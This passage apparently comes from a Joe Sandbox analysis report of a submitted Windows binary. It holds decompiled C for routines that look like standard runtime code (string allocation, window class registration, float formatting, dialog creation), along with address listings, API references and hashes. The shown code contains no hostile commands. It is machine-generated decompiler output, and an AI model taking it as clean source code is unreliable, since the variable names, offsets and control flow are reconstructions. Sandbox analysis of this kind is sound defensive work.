								__imp__#2(_t60);
								 *(_t112 + 0xc) = _t60;
							}
							return E00412FBB(_t60,  *((intOrPtr*)(_t127 + 0x88)));
						}
						L13:
						_t117 = lstrlenA( *(_t127 - 0x80)) + 1;
						E00412260(lstrlenA( *(_t127 - 0x80)) + 0x00000001 + lstrlenA( *(_t127 - 0x80)) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t60 = E00408F24(_t131,  *(_t127 - 0x80), _t117,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
						goto L14;
					}
					_push(0xf10a);
					E00428C25();
					 *_t112 = 0xf10a;
					goto L13;
				}
				 *(_t127 - 0x80) = _t103[0xc];
				 *_t112 = _t103[8];
				 *(_t112 + 0x10) = _t103[0x10];
				 *(_t112 + 0x1c) = _t103[0x1c];
				_t88 = _t103[0x14];
				 *(_t127 + 0x98) = _t88;
				if( *((intOrPtr*)(_t88 - 0xc)) != 0) {
					if(_t88 != 0) {
						_t121 = lstrlenA(_t88) + 1;
						E00412260(lstrlenA(_t88) + 0x00000001 + lstrlenA(_t88) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t88 = E00408F24(_t131,  *(_t127 + 0x98), _t121,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t88);
					 *(_t112 + 0xc) = _t88;
				}
				_t107 = _t103[0x18];
				_t89 = 0;
				if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
					if(_t107 != 0) {
						_t119 = lstrlenA(_t107) + 1;
						E00412260(lstrlenA(_t107) + 0x00000001 + lstrlenA(_t107) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t89 = E00408F24(_t131, _t107, _t119,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t89);
					 *(_t112 + 4) = _t89;
				}
				goto L12;
			}




















                                                                              0x0042f9c0
                                                                              0x0042f9cd
                                                                              0x0042f9d5
                                                                              0x0042f9db
                                                                              0x0042f9e1
                                                                              0x0042f9ec
                                                                              0x0042f9ef
                                                                              0x0042f9f4
                                                                              0x0042f9fa
                                                                              0x0042fa05
                                                                              0x0042fa07
                                                                              0x0042fa17
                                                                              0x0042fac5
                                                                              0x0042fac7
                                                                              0x0042face
                                                                              0x0042fad6
                                                                              0x0042fad7
                                                                              0x0042faea
                                                                              0x0042faef
                                                                              0x0042faf4
                                                                              0x0042faf9
                                                                              0x0042faf9
                                                                              0x0042fafe
                                                                              0x0042fb2b
                                                                              0x0042fb2c
                                                                              0x0042fb36
                                                                              0x0042fb39
                                                                              0x0042fb40
                                                                              0x0042fb45
                                                                              0x0042fb50
                                                                              0x0042fb5a
                                                                              0x0042fb67
                                                                              0x0042fb6c
                                                                              0x0042fb47
                                                                              0x0042fb47
                                                                              0x0042fb47
                                                                              0x0042fb73
                                                                              0x0042fb79
                                                                              0x0042fb79
                                                                              0x0042fb80
                                                                              0x0042fb90
                                                                              0x0042fb95
                                                                              0x0042fba0
                                                                              0x0042fbaa
                                                                              0x0042fbb7
                                                                              0x0042fb97
                                                                              0x0042fb97
                                                                              0x0042fb97
                                                                              0x0042fbbd
                                                                              0x0042fbc3
                                                                              0x0042fbc3
                                                                              0x0042fbe1
                                                                              0x0042fbe1
                                                                              0x0042fb00
                                                                              0x0042fb07
                                                                              0x0042fb11
                                                                              0x0042fb20
                                                                              0x0042fb25
                                                                              0x00000000
                                                                              0x0042fb25
                                                                              0x0042fad9
                                                                              0x0042fade
                                                                              0x0042fae3
                                                                              0x00000000
                                                                              0x0042fae3
                                                                              0x0042fa20
                                                                              0x0042fa27
                                                                              0x0042fa2d
                                                                              0x0042fa33
                                                                              0x0042fa36
                                                                              0x0042fa3d
                                                                              0x0042fa43
                                                                              0x0042fa47
                                                                              0x0042fa4e
                                                                              0x0042fa58
                                                                              0x0042fa6a
                                                                              0x0042fa6f
                                                                              0x0042fa6f
                                                                              0x0042fa76
                                                                              0x0042fa7c
                                                                              0x0042fa7c
                                                                              0x0042fa7f
                                                                              0x0042fa82
                                                                              0x0042fa87
                                                                              0x0042fa8b
                                                                              0x0042fa92
                                                                              0x0042fa9c
                                                                              0x0042faa9
                                                                              0x0042faae
                                                                              0x0042faae
                                                                              0x0042fab5
                                                                              0x0042fabb
                                                                              0x0042fabb
                                                                              0x00000000

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(?,0044B234), ref: 0042FA4A
                                                                                • Part of subcall function 00408F24: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,?,?), ref: 00408F46
                                                                              • SysAllocString.OLEAUT32(?), ref: 0042FA76
                                                                              • lstrlenA.KERNEL32(?,0044B234), ref: 0042FA8E
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042FAB5
                                                                              • lstrlenA.KERNEL32(?,0000F108,?,00000100,00449B80,0044B234), ref: 0042FB03
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042FB2C
                                                                              • lstrlenA.KERNEL32(?), ref: 0042FB4C
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042FB73
                                                                              • lstrlenA.KERNEL32(?), ref: 0042FB9C
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042FBBD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AllocStringlstrlen$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 2903237683-0
                                                                              • Opcode ID: 45545eed331dc10e38daf4459cc20624933f7e148aeba7e336886f60cbc21c1e
                                                                              • Instruction ID: 95e2cb44f51d560655b1b672b56ce74a8a5348faf5459b0af81ded966541d2a2
                                                                              • Opcode Fuzzy Hash: 45545eed331dc10e38daf4459cc20624933f7e148aeba7e336886f60cbc21c1e
                                                                              • Instruction Fuzzy Hash: 2051E372A00615ABCB20AFB5DC45B8BBBB8FF08314F50457BE915C7281DB78E954CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00425081, Relevance: 15.1, APIs: 10, Instructions: 81stringregistryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00425081() {
				signed int _t39;
				CHAR* _t43;
				int _t44;
				WNDCLASSA* _t63;
				void* _t71;
				void* _t73;

				E004128A0(E00430E48, _t71);
				_t63 =  *(_t71 + 8);
				 *((intOrPtr*)(_t71 - 0x10)) = _t73 - 0x38;
				if(GetClassInfoA(_t63->hInstance, _t63->lpszClassName, _t71 - 0x40) == 0) {
					if(RegisterClassA(_t63) == 0) {
						L5:
						_t39 = 0;
					} else {
						 *(_t71 - 0x18) = 1;
						if( *((char*)(E0042D179() + 0x14)) == 0) {
							L10:
							_t39 =  *(_t71 - 0x18);
						} else {
							E0042E21A(1);
							 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
							_t43 = E0042D179() + 0x34;
							 *(_t71 - 0x14) = _t43;
							_t44 = lstrlenA(_t43);
							_t13 = lstrlenA(_t63->lpszClassName) + 2; // 0x2
							if(_t44 + _t13 < 0x1000) {
								 *(_t71 + 8) = lstrlenA( *(_t71 - 0x14));
								_t19 = lstrlenA(_t63->lpszClassName) + 2; // 0x6
								if( *(_t71 + 8) + _t19 >= 0x1000) {
									 *(_t71 - 0x18) =  *(_t71 - 0x18) & 0x00000000;
									UnregisterClassA(_t63->lpszClassName, _t63->hInstance);
								} else {
									lstrcatA( *(_t71 - 0x14), _t63->lpszClassName);
									 *(_t71 + 0xa) = 0xa;
									 *((char*)(_t71 + 0xb)) = 0;
									lstrcatA( *(_t71 - 0x14), _t71 + 0xa);
								}
								 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
								E0042E27D(1);
								goto L10;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t39 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return _t39;
			}









                                                                              0x00425086
                                                                              0x00425091
                                                                              0x00425094
                                                                              0x004250a9
                                                                              0x004250bd
                                                                              0x00425106
                                                                              0x00425106
                                                                              0x004250bf
                                                                              0x004250c2
                                                                              0x004250ce
                                                                              0x0042515e
                                                                              0x0042515e
                                                                              0x004250d4
                                                                              0x004250d5
                                                                              0x004250da
                                                                              0x004250e9
                                                                              0x004250ed
                                                                              0x004250f0
                                                                              0x004250f9
                                                                              0x00425104
                                                                              0x00425112
                                                                              0x0042511a
                                                                              0x00425120
                                                                              0x00425146
                                                                              0x0042514d
                                                                              0x00425122
                                                                              0x0042512e
                                                                              0x00425137
                                                                              0x0042513b
                                                                              0x0042513f
                                                                              0x0042513f
                                                                              0x00425153
                                                                              0x00425159
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00425104
                                                                              0x004250ce
                                                                              0x004250ab
                                                                              0x004250ad
                                                                              0x004250ad
                                                                              0x00425166
                                                                              0x0042516f

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Classlstrlen$H_prologInfoRegister
                                                                              • String ID:
                                                                              • API String ID: 3690589370-0
                                                                              • Opcode ID: 919b9a9095e4ac863620c4403685a6b6106aeddbfd690dcb7436add64eb4c5a5
                                                                              • Instruction ID: 6f627533603d51bacd891d18b453acc12c50dc985cec7ff47600680533f7a54f
                                                                              • Opcode Fuzzy Hash: 919b9a9095e4ac863620c4403685a6b6106aeddbfd690dcb7436add64eb4c5a5
                                                                              • Instruction Fuzzy Hash: 2931A571E00629EFCF019FA0ED45BAE7FB4FF08354F104566E805A2661C7789A61CBA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041EA4D, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 228COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 73%
                                                                              			E0041EA4D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed short* _a24) {
				intOrPtr _v8;
				char _v9;
				signed int _v10;
				signed int _v14;
				signed int _v18;
				signed short _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v44;
				signed int _v48;
				signed short* _v52;
				intOrPtr _t87;
				signed int _t88;
				signed short* _t99;
				intOrPtr* _t100;
				signed int _t101;
				signed short _t103;
				signed int _t105;
				signed short* _t131;
				signed int _t133;
				signed int _t139;
				signed short* _t141;
				signed short _t149;
				signed int _t151;
				signed int _t152;
				signed int _t159;
				signed int _t161;
				signed int _t164;
				void* _t165;
				void* _t166;

				_t87 =  *0x457184; // 0xb7aa1229
				_v8 = _t87;
				_t88 = _a12;
				_t131 = _a24;
				_t133 = _t88 & 0x00008000;
				_v32 = 0xcc;
				_v31 = 0xcc;
				_v30 = 0xcc;
				_v29 = 0xcc;
				_v28 = 0xcc;
				_v27 = 0xcc;
				_v26 = 0xcc;
				_v25 = 0xcc;
				_v24 = 0xcc;
				_v23 = 0xcc;
				_v22 = 0xfb;
				_v21 = 0x3f;
				_v48 = 1;
				_t149 = _t88 & 0x00007fff;
				if(_t133 == 0) {
					_t131[1] = 0x20;
				} else {
					_t131[1] = 0x2d;
				}
				_t151 = _a8;
				if(_t149 != 0 || _t151 != 0 || _a4 != _t151) {
					if(_t149 != 0x7fff) {
						_t90 = _t149 & 0x0000ffff;
						_v20 = _v20 & 0x00000000;
						_v18 = _a4;
						_t159 = (((_t149 & 0x0000ffff) >> 8) + (_t151 >> 0x18) * 2) * 0x4d + _t90 * 0x4d10 - 0x134312f4 >> 0x10;
						_v10 = _t149;
						_v14 = _t151;
						E0041F41C(_t131, _t151, _t159,  &_v20,  ~_t159, 1);
						_t166 = _t165 + 0xc;
						__eflags = _v10 - 0x3fff;
						if(_v10 >= 0x3fff) {
							_t159 = _t159 + 1;
							__eflags = _t159;
							E0041F1EA(_t131, _t151, _t159,  &_v20,  &_v32);
						}
						__eflags = _a20 & 0x00000001;
						_t152 = _a16;
						 *_t131 = _t159;
						if((_a20 & 0x00000001) == 0) {
							L27:
							__eflags = _t152 - 0x15;
							if(_t152 > 0x15) {
								_t152 = 0x15;
							}
							_t161 = (_v10 & 0x0000ffff) - 0x3ffe;
							_t52 =  &_v10;
							 *_t52 = _v10 & 0x00000000;
							__eflags =  *_t52;
							_a12 = 8;
							do {
								E0041E4E0( &_v20);
								_t56 =  &_a12;
								 *_t56 = _a12 - 1;
								__eflags =  *_t56;
							} while ( *_t56 != 0);
							__eflags = _t161;
							if(_t161 < 0) {
								_t164 =  ~_t161 & 0x000000ff;
								__eflags = _t164;
								if(_t164 > 0) {
									do {
										E0041E50E( &_v20);
										_t164 = _t164 - 1;
										__eflags = _t164;
									} while (_t164 != 0);
								}
							}
							_t59 = _t152 + 1; // 0xcd
							_t139 = _t59;
							__eflags = _t139;
							_t99 =  &(_t131[2]);
							_v52 = _t99;
							if(_t139 > 0) {
								_a12 = _t139;
								do {
									asm("movsd");
									asm("movsd");
									asm("movsd");
									E0041E4E0( &_v20);
									E0041E4E0( &_v20);
									E0041E482(__eflags,  &_v20,  &_v44);
									E0041E4E0( &_v20);
									_t166 = _t166 + 0x14;
									_v52 =  &(_v52[0]);
									_t74 =  &_a12;
									 *_t74 = _a12 - 1;
									__eflags =  *_t74;
									 *_v52 = _v9 + 0x30;
									_v9 = 0;
								} while ( *_t74 != 0);
								_t99 = _v52;
							}
							_t100 = _t99 - 1;
							_t101 = _t100 - 1;
							__eflags =  *_t100 - 0x35;
							_t141 =  &(_t131[2]);
							if( *_t100 < 0x35) {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x30;
									if( *_t101 == 0x30) {
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 >= _t141) {
									goto L46;
								} else {
									 *_t141 = 0x30;
									goto L54;
								}
							} else {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x39;
									if( *_t101 == 0x39) {
										 *_t101 = 0x30;
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 < _t141) {
									_t101 = _t101 + 1;
									 *_t131 =  *_t131 + 1;
									__eflags =  *_t131;
								}
								 *_t101 =  *_t101 + 1;
								__eflags =  *_t101;
								L46:
								_t103 = _t101 - _t131 - 3;
								__eflags = _t103;
								_t131[1] = _t103;
								 *((char*)( &(_t131[2]) + _t103)) = 0;
								goto L47;
							}
						} else {
							_t152 = _t152 + _t159;
							__eflags = _t152;
							if(_t152 > 0) {
								goto L27;
							} else {
								goto L26;
							}
						}
					} else {
						 *_t131 = 1;
						if(_t151 != 0x80000000 || _a4 != 0) {
							if((_t151 & 0x40000000) != 0) {
								goto L11;
							} else {
								_push("1#SNAN");
								goto L21;
							}
						} else {
							L11:
							__eflags = _t133;
							if(_t133 == 0) {
								L15:
								__eflags = _t151 - 0x80000000;
								if(_t151 != 0x80000000) {
									goto L20;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										goto L20;
									} else {
										_push("1#INF");
										goto L18;
									}
								}
							} else {
								__eflags = _t151 - 0xc0000000;
								if(_t151 != 0xc0000000) {
									goto L15;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										L20:
										_push("1#QNAN");
										L21:
										_push( &(_t131[2]));
										E00419460();
										_t131[1] = 6;
									} else {
										_push("1#IND");
										L18:
										_push( &(_t131[2]));
										E00419460();
										_t131[1] = 5;
									}
								}
							}
						}
						_v48 = _v48 & 0x00000000;
						L47:
						_t105 = _v48;
					}
				} else {
					L26:
					_t131[2] = 0x30;
					L54:
					 *_t131 =  *_t131 & 0x00000000;
					_t131[1] = 0x20;
					_t131[1] = 1;
					_t131[2] = 0;
					_t105 = 1;
				}
				return E00412FBB(_t105, _v8);
			}











































                                                                              0x0041ea53
                                                                              0x0041ea58
                                                                              0x0041ea5b
                                                                              0x0041ea5f
                                                                              0x0041ea6a
                                                                              0x0041ea76
                                                                              0x0041ea7a
                                                                              0x0041ea7e
                                                                              0x0041ea82
                                                                              0x0041ea86
                                                                              0x0041ea8a
                                                                              0x0041ea8e
                                                                              0x0041ea92
                                                                              0x0041ea96
                                                                              0x0041ea9a
                                                                              0x0041ea9e
                                                                              0x0041eaa2
                                                                              0x0041eaa6
                                                                              0x0041eaad
                                                                              0x0041eaaf
                                                                              0x0041eab7
                                                                              0x0041eab1
                                                                              0x0041eab1
                                                                              0x0041eab1
                                                                              0x0041eabe
                                                                              0x0041eac1
                                                                              0x0041ead3
                                                                              0x0041eb4d
                                                                              0x0041eb58
                                                                              0x0041eb75
                                                                              0x0041eb78
                                                                              0x0041eb87
                                                                              0x0041eb8b
                                                                              0x0041eb8e
                                                                              0x0041eb93
                                                                              0x0041eb96
                                                                              0x0041eb9c
                                                                              0x0041eba6
                                                                              0x0041eba6
                                                                              0x0041eba7
                                                                              0x0041ebad
                                                                              0x0041ebae
                                                                              0x0041ebb2
                                                                              0x0041ebb5
                                                                              0x0041ebb8
                                                                              0x0041ebcc
                                                                              0x0041ebcc
                                                                              0x0041ebcf
                                                                              0x0041ebd3
                                                                              0x0041ebd3
                                                                              0x0041ebd8
                                                                              0x0041ebde
                                                                              0x0041ebde
                                                                              0x0041ebde
                                                                              0x0041ebe3
                                                                              0x0041ebea
                                                                              0x0041ebee
                                                                              0x0041ebf3
                                                                              0x0041ebf3
                                                                              0x0041ebf3
                                                                              0x0041ebf6
                                                                              0x0041ebf9
                                                                              0x0041ebfb
                                                                              0x0041ebff
                                                                              0x0041ebff
                                                                              0x0041ec05
                                                                              0x0041ec07
                                                                              0x0041ec0b
                                                                              0x0041ec10
                                                                              0x0041ec10
                                                                              0x0041ec11
                                                                              0x0041ec07
                                                                              0x0041ec05
                                                                              0x0041ec14
                                                                              0x0041ec14
                                                                              0x0041ec17
                                                                              0x0041ec19
                                                                              0x0041ec1c
                                                                              0x0041ec1f
                                                                              0x0041ec21
                                                                              0x0041ec24
                                                                              0x0041ec2a
                                                                              0x0041ec2b
                                                                              0x0041ec30
                                                                              0x0041ec31
                                                                              0x0041ec3a
                                                                              0x0041ec47
                                                                              0x0041ec50
                                                                              0x0041ec5d
                                                                              0x0041ec60
                                                                              0x0041ec63
                                                                              0x0041ec63
                                                                              0x0041ec63
                                                                              0x0041ec66
                                                                              0x0041ec68
                                                                              0x0041ec68
                                                                              0x0041ec6e
                                                                              0x0041ec6e
                                                                              0x0041ec71
                                                                              0x0041ec74
                                                                              0x0041ec75
                                                                              0x0041ec78
                                                                              0x0041ec7b
                                                                              0x0041ecbb
                                                                              0x0041ecbb
                                                                              0x0041ecbd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ecb5
                                                                              0x0041ecb8
                                                                              0x0041ecba
                                                                              0x0041ecba
                                                                              0x00000000
                                                                              0x0041ecba
                                                                              0x00000000
                                                                              0x0041ecb8
                                                                              0x0041ecbf
                                                                              0x0041ecc1
                                                                              0x00000000
                                                                              0x0041ecc3
                                                                              0x0041ecc3
                                                                              0x00000000
                                                                              0x0041ecc3
                                                                              0x0041ec7d
                                                                              0x0041ec88
                                                                              0x0041ec88
                                                                              0x0041ec8a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ec7f
                                                                              0x0041ec82
                                                                              0x0041ec84
                                                                              0x0041ec87
                                                                              0x0041ec87
                                                                              0x00000000
                                                                              0x0041ec87
                                                                              0x00000000
                                                                              0x0041ec82
                                                                              0x0041ec8c
                                                                              0x0041ec8e
                                                                              0x0041ec90
                                                                              0x0041ec91
                                                                              0x0041ec91
                                                                              0x0041ec91
                                                                              0x0041ec94
                                                                              0x0041ec94
                                                                              0x0041ec96
                                                                              0x0041ec98
                                                                              0x0041ec98
                                                                              0x0041ec9a
                                                                              0x0041eca0
                                                                              0x00000000
                                                                              0x0041eca0
                                                                              0x0041ebba
                                                                              0x0041ebbd
                                                                              0x0041ebbf
                                                                              0x0041ebc1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ebc1
                                                                              0x0041ead5
                                                                              0x0041eadc
                                                                              0x0041eae1
                                                                              0x0041eaef
                                                                              0x00000000
                                                                              0x0041eaf1
                                                                              0x0041eaf1
                                                                              0x00000000
                                                                              0x0041eaf1
                                                                              0x0041eaf8
                                                                              0x0041eaf8
                                                                              0x0041eaf8
                                                                              0x0041eafb
                                                                              0x0041eb12
                                                                              0x0041eb12
                                                                              0x0041eb14
                                                                              0x00000000
                                                                              0x0041eb16
                                                                              0x0041eb16
                                                                              0x0041eb1a
                                                                              0x00000000
                                                                              0x0041eb1c
                                                                              0x0041eb1c
                                                                              0x00000000
                                                                              0x0041eb1c
                                                                              0x0041eb1a
                                                                              0x0041eafd
                                                                              0x0041eafd
                                                                              0x0041eb03
                                                                              0x00000000
                                                                              0x0041eb05
                                                                              0x0041eb05
                                                                              0x0041eb09
                                                                              0x0041eb39
                                                                              0x0041eb39
                                                                              0x0041eb3e
                                                                              0x0041eb41
                                                                              0x0041eb42
                                                                              0x0041eb47
                                                                              0x0041eb0b
                                                                              0x0041eb0b
                                                                              0x0041eb21
                                                                              0x0041eb24
                                                                              0x0041eb25
                                                                              0x0041eb2a
                                                                              0x0041eb2a
                                                                              0x0041eb09
                                                                              0x0041eb03
                                                                              0x0041eafb
                                                                              0x0041eb2e
                                                                              0x0041eca5
                                                                              0x0041eca5
                                                                              0x0041eca5
                                                                              0x0041ebc3
                                                                              0x0041ebc3
                                                                              0x0041ebc3
                                                                              0x0041ecc6
                                                                              0x0041ecc6
                                                                              0x0041eccc
                                                                              0x0041ecd0
                                                                              0x0041ecd4
                                                                              0x0041ecd8
                                                                              0x0041ecd8
                                                                              0x0041ecb4

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strcat$___shr_12
                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                              • API String ID: 1152255961-4131533671
                                                                              • Opcode ID: bc08e7d89d2bb6202aeacce8bb6cff8cc1f909d0250d6a3ad86d50561d1589ea
                                                                              • Instruction ID: bdc97a90c6a41f82a9cd33cd0c27e1fe5640516d42d63c26ed1cf3eaf4c48473
                                                                              • Opcode Fuzzy Hash: bc08e7d89d2bb6202aeacce8bb6cff8cc1f909d0250d6a3ad86d50561d1589ea
                                                                              • Instruction Fuzzy Hash: BD81163580429A8EDF11CB69C9447EFBBB4AF21314F08455BEC51DB282E3789685C7A9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004249D9, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 96%
                                                                              			E004249D9(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				intOrPtr* _t68;
				signed int _t74;
				signed int _t76;
				struct HWND__* _t77;
				signed int _t80;
				int _t96;
				signed int _t97;
				intOrPtr* _t107;
				signed int _t116;
				signed int _t135;
				DLGTEMPLATE* _t136;
				struct HWND__* _t138;
				void* _t139;
				void* _t141;

				_t109 = __ecx;
				E004128A0(E00430DBD, _t139);
				_t107 = __ecx;
				 *((intOrPtr*)(_t139 - 0x10)) = _t141 - 0x3c;
				 *((intOrPtr*)(_t139 - 0x20)) = __ecx;
				if( *(_t139 + 0x10) == 0) {
					 *(_t139 + 0x10) =  *(E0042D179() + 0xc);
				}
				_t135 =  *(E0042D179() + 0x1038);
				 *(_t139 - 0x28) = _t135;
				 *(_t139 - 0x14) = 0;
				 *((intOrPtr*)(_t139 - 0x24)) = 0;
				 *(_t139 - 4) = 0;
				E0042605F(_t109, 0x10);
				E0042605F(_t109, 0x7c000);
				if(_t135 == 0) {
					_t136 =  *(_t139 + 8);
					L7:
					__eflags = _t136;
					if(__eflags == 0) {
						L4:
						_t67 = 0;
						L32:
						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0xc));
						return _t67;
					}
					_t68 = E00428A50();
					_t129 =  *_t68;
					 *((intOrPtr*)(_t139 - 0x1c)) =  *((intOrPtr*)( *_t68 + 0xc))() + 0x10;
					 *(_t139 - 4) = 1;
					 *((intOrPtr*)(_t139 - 0x18)) = 0;
					__eflags = E004299D5(_t139, __eflags, _t136, _t139 - 0x1c, _t139 - 0x18);
					__eflags =  *0x45a364; // 0x0
					_t74 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t74;
						if(_t74 == 0) {
							L17:
							 *(_t107 + 0x40) =  *(_t107 + 0x40) | 0xffffffff;
							 *(_t107 + 0x38) =  *(_t107 + 0x38) | 0x00000010;
							_push(_t107);
							E004276F9();
							_t76 =  *(_t139 + 0xc);
							__eflags = _t76;
							if(_t76 != 0) {
								_t77 =  *(_t76 + 0x1c);
							} else {
								_t77 = 0;
							}
							_t138 = CreateDialogIndirectParamA( *(_t139 + 0x10), _t136, _t77, E00424470, 0);
							E00401000( *((intOrPtr*)(_t139 - 0x1c)) + 0xfffffff0, _t129);
							_t116 =  *(_t139 - 0x28);
							 *(_t139 - 4) =  *(_t139 - 4) | 0xffffffff;
							__eflags = _t116;
							if(_t116 != 0) {
								 *((intOrPtr*)( *_t116 + 0x14))(_t139 - 0x48);
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)( *_t107 + 0x12c))(0);
								}
							}
							_t80 = E004264AE();
							__eflags = _t80;
							if(_t80 == 0) {
								 *((intOrPtr*)( *_t107 + 0x114))();
							}
							__eflags = _t138;
							if(_t138 != 0) {
								__eflags =  *(_t107 + 0x38) & 0x00000010;
								if(( *(_t107 + 0x38) & 0x00000010) == 0) {
									DestroyWindow(_t138);
									_t138 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t139 - 0x14);
							if( *(_t139 - 0x14) != 0) {
								GlobalUnlock( *(_t139 - 0x14));
								GlobalFree( *(_t139 - 0x14));
							}
							__eflags = _t138;
							_t60 = _t138 != 0;
							__eflags = _t60;
							_t67 = 0 | _t60;
							goto L32;
						}
						L15:
						E004299A6(_t139 - 0x38, _t136);
						 *(_t139 - 4) = 2;
						E00429908(_t107, _t139 - 0x38, 0, _t136,  *((intOrPtr*)(_t139 - 0x18)));
						 *(_t139 - 0x14) = E004296BC(_t139 - 0x38);
						 *(_t139 - 4) = 1;
						E004296AE(_t139 - 0x38);
						__eflags =  *(_t139 - 0x14);
						if( *(_t139 - 0x14) != 0) {
							_t136 = GlobalLock( *(_t139 - 0x14));
						}
						goto L17;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L15;
					}
					_t96 = GetSystemMetrics(0x2a);
					__eflags = _t96;
					if(_t96 == 0) {
						goto L17;
					}
					_t97 = E004132A8( *((intOrPtr*)(_t139 - 0x1c)), "MS Shell Dlg");
					asm("sbb al, al");
					_t74 =  ~_t97 + 0x00000001 & 0x000000ff;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t139 - 0x18)) - 8;
					if( *((short*)(_t139 - 0x18)) == 8) {
						 *((intOrPtr*)(_t139 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t139 - 0x48);
				if( *((intOrPtr*)( *_t107 + 0x12c))() != 0) {
					_t136 =  *((intOrPtr*)( *_t135 + 0x10))(_t139 - 0x48,  *(_t139 + 8));
					goto L7;
				}
				goto L4;
			}





















